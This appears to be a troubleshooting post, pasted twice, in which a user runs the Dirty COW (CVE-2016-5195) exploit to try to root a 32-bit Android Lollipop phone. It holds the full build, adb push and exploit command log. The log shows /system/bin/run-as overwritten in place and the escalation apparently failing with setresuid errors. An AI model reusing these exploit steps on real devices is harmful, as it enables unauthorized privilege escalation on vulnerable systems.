Trying to run this because there is no other way to try and get access to the system on this phone on Lollipop 32-bit.
Make test labels it as vulnerable.
make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-22
make[1]: Entering directory '/Users/xxx/Downloads/Dirtyc0w stardust/CVE-2016-5195-master'
[armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory '/Users/xxx/Downloads/Dirtyc0w stardust/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file push...pped. 46.8 MB/s (9156 bytes in 0.000s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
libs/armeabi-v7a/run-as: 1 file pushed...pped. 26.2 MB/s (4696 bytes in 0.000s)
adb shell 'cat /system/bin/run-as > /data/local/tmp/run-as-original'
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as --no-pad'
WARNING: linker: Unsupported flags DT_FLAGS_1=0x8000001
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffef5 arg 0x4dc
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x4bc
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/run-as /system/bin/run-as
warning: source file size (4696) and destination file size (9444) differ
will overwrite first 4696 bytes of destination only
[] size 4696
[] mmap 0xb6e34000
[] currently 0xb6e34000=464c457f
[] using /proc/self/mem method
[] madvise thread starts, address 0xb6e34000, size 4696
[] check thread starts, address 0xb6e34000, size 4696
[] check thread stops, patch successful, iterations 0
[] /proc/self/mem 356896 76
[] madvise thread stops, return code sum 0, iterations 497
[] finished pid=0 sees 0xb6e34000=464c457f
__
adb shell
1|shell@SG601SH:/ $ /system/bin/run-as
WARNING: linker: Unsupported flags DT_FLAGS_1=0x8000001
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffef5 arg 0x3c8
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffffe arg 0x388
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6fffffff arg 0x2
uid /system/bin/run-as 2000
setresgid/setresuid failed
uid 2000
0 u:r:runas:s0
context 0 u:r:shell:s0
shell@SG601SH:/ $
Trying to run this because there is no other way to try and get access to the system on this phone on Lollipop 32-bit.
Make test labels it as vulnerable.
make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-22
make[1]: Entering directory '/Users/xxx/Downloads/Dirtyc0w stardust/CVE-2016-5195-master'
[armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory '/Users/xxx/Downloads/Dirtyc0w stardust/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file push...pped. 46.8 MB/s (9156 bytes in 0.000s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
libs/armeabi-v7a/run-as: 1 file pushed...pped. 26.2 MB/s (4696 bytes in 0.000s)
adb shell 'cat /system/bin/run-as > /data/local/tmp/run-as-original'
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as --no-pad'
WARNING: linker: Unsupported flags DT_FLAGS_1=0x8000001
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffef5 arg 0x4dc
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x4bc
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/run-as /system/bin/run-as
warning: source file size (4696) and destination file size (9444) differ
will overwrite first 4696 bytes of destination only
[] size 4696
[] mmap 0xb6e34000
[] currently 0xb6e34000=464c457f
[] using /proc/self/mem method
[] madvise thread starts, address 0xb6e34000, size 4696
[] check thread starts, address 0xb6e34000, size 4696
[] check thread stops, patch successful, iterations 0
[] /proc/self/mem 356896 76
[] madvise thread stops, return code sum 0, iterations 497
[] finished pid=0 sees 0xb6e34000=464c457f
__
adb shell
1|shell@SG601SH:/ $ /system/bin/run-as
WARNING: linker: Unsupported flags DT_FLAGS_1=0x8000001
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffef5 arg 0x3c8
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffffe arg 0x388
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6fffffff arg 0x2
uid /system/bin/run-as 2000
setresgid/setresuid failed
uid 2000
0 u:r:runas:s0
context 0 u:r:shell:s0
shell@SG601SH:/ $